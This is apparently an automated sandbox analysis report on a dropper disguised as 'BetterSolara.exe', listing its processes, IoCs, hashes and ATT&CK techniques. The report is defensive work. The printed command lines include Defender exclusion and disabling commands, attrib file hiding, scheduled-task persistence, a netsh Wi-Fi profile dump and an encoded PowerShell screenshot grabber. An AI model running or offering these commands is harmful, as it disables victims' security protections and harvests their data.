37114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	cd57e4c271d6e8f5ea8b8f824a6a7316.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

cd57e4c271d6e8f5ea8b8f824a6a7316.exepowershell.exepowershell.exe

pid	process
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
688	powershell.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
688	powershell.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2168	powershell.exe
2168	powershell.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2168	powershell.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

cd57e4c271d6e8f5ea8b8f824a6a7316.exewmic.exewmic.exe

description	pid	process
Token: SeDebugPrivilege	2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
Token: SeIncreaseQuotaPrivilege	4948	wmic.exe
Token: SeSecurityPrivilege	4948	wmic.exe
Token: SeTakeOwnershipPrivilege	4948	wmic.exe
Token: SeLoadDriverPrivilege	4948	wmic.exe
Token: SeSystemProfilePrivilege	4948	wmic.exe
Token: SeSystemtimePrivilege	4948	wmic.exe
Token: SeProfSingleProcessPrivilege	4948	wmic.exe
Token: SeIncBasePriorityPrivilege	4948	wmic.exe
Token: SeCreatePagefilePrivilege	4948	wmic.exe
Token: SeBackupPrivilege	4948	wmic.exe
Token: SeRestorePrivilege	4948	wmic.exe
Token: SeShutdownPrivilege	4948	wmic.exe
Token: SeDebugPrivilege	4948	wmic.exe
Token: SeSystemEnvironmentPrivilege	4948	wmic.exe
Token: SeRemoteShutdownPrivilege	4948	wmic.exe
Token: SeUndockPrivilege	4948	wmic.exe
Token: SeManageVolumePrivilege	4948	wmic.exe
Token: 33	4948	wmic.exe
Token: 34	4948	wmic.exe
Token: 35	4948	wmic.exe
Token: 36	4948	wmic.exe
Token: SeIncreaseQuotaPrivilege	4948	wmic.exe
Token: SeSecurityPrivilege	4948	wmic.exe
Token: SeTakeOwnershipPrivilege	4948	wmic.exe
Token: SeLoadDriverPrivilege	4948	wmic.exe
Token: SeSystemProfilePrivilege	4948	wmic.exe
Token: SeSystemtimePrivilege	4948	wmic.exe
Token: SeProfSingleProcessPrivilege	4948	wmic.exe
Token: SeIncBasePriorityPrivilege	4948	wmic.exe
Token: SeCreatePagefilePrivilege	4948	wmic.exe
Token: SeBackupPrivilege	4948	wmic.exe
Token: SeRestorePrivilege	4948	wmic.exe
Token: SeShutdownPrivilege	4948	wmic.exe
Token: SeDebugPrivilege	4948	wmic.exe
Token: SeSystemEnvironmentPrivilege	4948	wmic.exe
Token: SeRemoteShutdownPrivilege	4948	wmic.exe
Token: SeUndockPrivilege	4948	wmic.exe
Token: SeManageVolumePrivilege	4948	wmic.exe
Token: 33	4948	wmic.exe
Token: 34	4948	wmic.exe
Token: 35	4948	wmic.exe
Token: 36	4948	wmic.exe
Token: SeIncreaseQuotaPrivilege	3032	wmic.exe
Token: SeSecurityPrivilege	3032	wmic.exe
Token: SeTakeOwnershipPrivilege	3032	wmic.exe
Token: SeLoadDriverPrivilege	3032	wmic.exe
Token: SeSystemProfilePrivilege	3032	wmic.exe
Token: SeSystemtimePrivilege	3032	wmic.exe
Token: SeProfSingleProcessPrivilege	3032	wmic.exe
Token: SeIncBasePriorityPrivilege	3032	wmic.exe
Token: SeCreatePagefilePrivilege	3032	wmic.exe
Token: SeBackupPrivilege	3032	wmic.exe
Token: SeRestorePrivilege	3032	wmic.exe
Token: SeShutdownPrivilege	3032	wmic.exe
Token: SeDebugPrivilege	3032	wmic.exe
Token: SeSystemEnvironmentPrivilege	3032	wmic.exe
Token: SeRemoteShutdownPrivilege	3032	wmic.exe
Token: SeUndockPrivilege	3032	wmic.exe
Token: SeManageVolumePrivilege	3032	wmic.exe
Token: 33	3032	wmic.exe
Token: 34	3032	wmic.exe
Token: 35	3032	wmic.exe
Token: 36	3032	wmic.exe

Suspicious use of WriteProcessMemory 56 IoCs

Processes:

BetterSolara.execmd.execd57e4c271d6e8f5ea8b8f824a6a7316.execd57e4c172d6e8f5ea8b8f824a6a7316.execd57e4c172d6e8f5ea8b8f824a6a7316.exepowershell.execsc.exe

description	pid	process	target process
PID 1888 wrote to memory of 2040	1888	BetterSolara.exe	cmd.exe
PID 1888 wrote to memory of 2040	1888	BetterSolara.exe	cmd.exe
PID 2040 wrote to memory of 2068	2040	cmd.exe	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
PID 2040 wrote to memory of 2068	2040	cmd.exe	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
PID 2040 wrote to memory of 2760	2040	cmd.exe	cd57e4c172d6e8f5ea8b8f824a6a7316.exe
PID 2040 wrote to memory of 2760	2040	cmd.exe	cd57e4c172d6e8f5ea8b8f824a6a7316.exe
PID 2040 wrote to memory of 2760	2040	cmd.exe	cd57e4c172d6e8f5ea8b8f824a6a7316.exe
PID 2040 wrote to memory of 2032	2040	cmd.exe	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
PID 2040 wrote to memory of 2032	2040	cmd.exe	cd57e4c271d6e8f5ea8b8f824a6a7316.exe
PID 2032 wrote to memory of 4612	2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe	attrib.exe
PID 2032 wrote to memory of 4612	2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe	attrib.exe
PID 2760 wrote to memory of 2096	2760	cd57e4c172d6e8f5ea8b8f824a6a7316.exe	cd57e4c172d6e8f5ea8b8f824a6a7316.exe
PID 2760 wrote to memory of 2096	2760	cd57e4c172d6e8f5ea8b8f824a6a7316.exe	cd57e4c172d6e8f5ea8b8f824a6a7316.exe
PID 2760 wrote to memory of 2096	2760	cd57e4c172d6e8f5ea8b8f824a6a7316.exe	cd57e4c172d6e8f5ea8b8f824a6a7316.exe
PID 2096 wrote to memory of 1052	2096	cd57e4c172d6e8f5ea8b8f824a6a7316.exe	schtasks.exe
PID 2096 wrote to memory of 1052	2096	cd57e4c172d6e8f5ea8b8f824a6a7316.exe	schtasks.exe
PID 2096 wrote to memory of 1052	2096	cd57e4c172d6e8f5ea8b8f824a6a7316.exe	schtasks.exe
PID 2032 wrote to memory of 3224	2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe	attrib.exe
PID 2032 wrote to memory of 3224	2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe	attrib.exe
PID 2032 wrote to memory of 4948	2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe	wmic.exe
PID 2032 wrote to memory of 4948	2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe	wmic.exe
PID 2032 wrote to memory of 3032	2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe	wmic.exe
PID 2032 wrote to memory of 3032	2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe	wmic.exe
PID 2032 wrote to memory of 688	2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe	powershell.exe
PID 2032 wrote to memory of 688	2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe	powershell.exe
PID 2032 wrote to memory of 4396	2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe	wmic.exe
PID 2032 wrote to memory of 4396	2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe	wmic.exe
PID 2032 wrote to memory of 1536	2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe	wmic.exe
PID 2032 wrote to memory of 1536	2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe	wmic.exe
PID 2032 wrote to memory of 2168	2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe	powershell.exe
PID 2032 wrote to memory of 2168	2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe	powershell.exe
PID 2032 wrote to memory of 4084	2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe	wmic.exe
PID 2032 wrote to memory of 4084	2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe	wmic.exe
PID 2032 wrote to memory of 3704	2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe	wmic.exe
PID 2032 wrote to memory of 3704	2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe	wmic.exe
PID 2032 wrote to memory of 3804	2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe	attrib.exe
PID 2032 wrote to memory of 3804	2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe	attrib.exe
PID 2032 wrote to memory of 4060	2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe	attrib.exe
PID 2032 wrote to memory of 4060	2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe	attrib.exe
PID 2032 wrote to memory of 4612	2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe	netsh.exe
PID 2032 wrote to memory of 4612	2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe	netsh.exe
PID 2032 wrote to memory of 4820	2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe	powershell.exe
PID 2032 wrote to memory of 4820	2032	cd57e4c271d6e8f5ea8b8f824a6a7316.exe	powershell.exe
PID 4820 wrote to memory of 1748	4820	powershell.exe	csc.exe
PID 4820 wrote to memory of 1748	4820	powershell.exe	csc.exe
PID 1748 wrote to memory of 4320	1748	csc.exe	cvtres.exe
PID 1748 wrote to memory of 4320	1748	csc.exe	cvtres.exe
PID 2096 wrote to memory of 2720	2096	cd57e4c172d6e8f5ea8b8f824a6a7316.exe	schtasks.exe
PID 2096 wrote to memory of 2720	2096	cd57e4c172d6e8f5ea8b8f824a6a7316.exe	schtasks.exe
PID 2096 wrote to memory of 2720	2096	cd57e4c172d6e8f5ea8b8f824a6a7316.exe	schtasks.exe
PID 2096 wrote to memory of 3416	2096	cd57e4c172d6e8f5ea8b8f824a6a7316.exe	schtasks.exe
PID 2096 wrote to memory of 3416	2096	cd57e4c172d6e8f5ea8b8f824a6a7316.exe	schtasks.exe
PID 2096 wrote to memory of 3416	2096	cd57e4c172d6e8f5ea8b8f824a6a7316.exe	schtasks.exe
PID 2096 wrote to memory of 2220	2096	cd57e4c172d6e8f5ea8b8f824a6a7316.exe	cmd.exe
PID 2096 wrote to memory of 2220	2096	cd57e4c172d6e8f5ea8b8f824a6a7316.exe	cmd.exe
PID 2096 wrote to memory of 2220	2096	cd57e4c172d6e8f5ea8b8f824a6a7316.exe	cmd.exe

Views/modifies file attributes 1 TTPs 4 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exe

pid process

3804 attrib.exe
4060 attrib.exe
4612 attrib.exe
3224 attrib.exe

pid	process
3804	attrib.exe
4060	attrib.exe
4612	attrib.exe
3224	attrib.exe

C:\Users\Admin\AppData\Local\Temp\BetterSolara.exe
"C:\Users\Admin\AppData\Local\Temp\BetterSolara.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:2040

C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c171d6e8f5ea8b8f824a6a7316.exe
cd57e4c171d6e8f5ea8b8f824a6a7316.exe
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2068

C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c172d6e8f5ea8b8f824a6a7316.exe
cd57e4c172d6e8f5ea8b8f824a6a7316.exe
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2760

C:\Users\Admin\AppData\Roaming\XenoManager\cd57e4c172d6e8f5ea8b8f824a6a7316.exe
"C:\Users\Admin\AppData\Roaming\XenoManager\cd57e4c172d6e8f5ea8b8f824a6a7316.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2096

C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /Create /TN "Console" /XML "C:\Users\Admin\AppData\Local\Temp\tmp4C4B.tmp" /F
5⤵
- Creates scheduled task(s)
PID:1052

C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /query /v /fo csv
5⤵
PID:2720

C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /delete /tn "\Console" /f
5⤵
PID:3416

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\XenoManager\cd57e4c172d6e8f5ea8b8f824a6a7316.exe"
5⤵
PID:2220

C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c271d6e8f5ea8b8f824a6a7316.exe
cd57e4c271d6e8f5ea8b8f824a6a7316.exe
3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Maps connected drives based on registry
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2032

C:\Windows\system32\attrib.exe
attrib +h +s C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c271d6e8f5ea8b8f824a6a7316.exe
4⤵
- Views/modifies file attributes
PID:4612

C:\Windows\system32\attrib.exe
attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
4⤵
- Views/modifies file attributes
PID:3224

C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4948

C:\Windows\System32\Wbem\wmic.exe
wmic path win32_VideoController get name
4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:3032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c271d6e8f5ea8b8f824a6a7316.exe
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:688

C:\Windows\System32\Wbem\wmic.exe
wmic os get Caption
4⤵
PID:4396

C:\Windows\System32\Wbem\wmic.exe
wmic cpu get Name
4⤵
PID:1536

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2168

C:\Windows\System32\Wbem\wmic.exe
wmic path win32_VideoController get name
4⤵
- Detects videocard installed
PID:4084

C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
4⤵
PID:3704

C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:3804

C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:4060

C:\Windows\system32\netsh.exe
netsh wlan show profiles
4⤵
PID:4612

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of WriteProcessMemory
PID:4820

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gntaur1q\gntaur1q.cmdline"
5⤵
- Suspicious use of WriteProcessMemory
PID:1748

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES59A9.tmp" "c:\Users\Admin\AppData\Local\Temp\gntaur1q\CSCEBC7FD232D7C478BAE43FE8039FC7AA5.TMP"
6⤵
PID:4320

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4684

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
15dde0683cd1ca19785d7262f554ba93

SHA1
d039c577e438546d10ac64837b05da480d06bf69

SHA256
d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961

SHA512
57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES59A9.tmp
Filesize
1KB

MD5
d74b506bc7657ff450268733bf5cbe56

SHA1
ca24a560fd65daf08003681f2f0bad69b0eca14a

SHA256
22d652f6c395dccdd0c738298ea99a199d454dcd2e1573f8340494bd912a61c5

SHA512
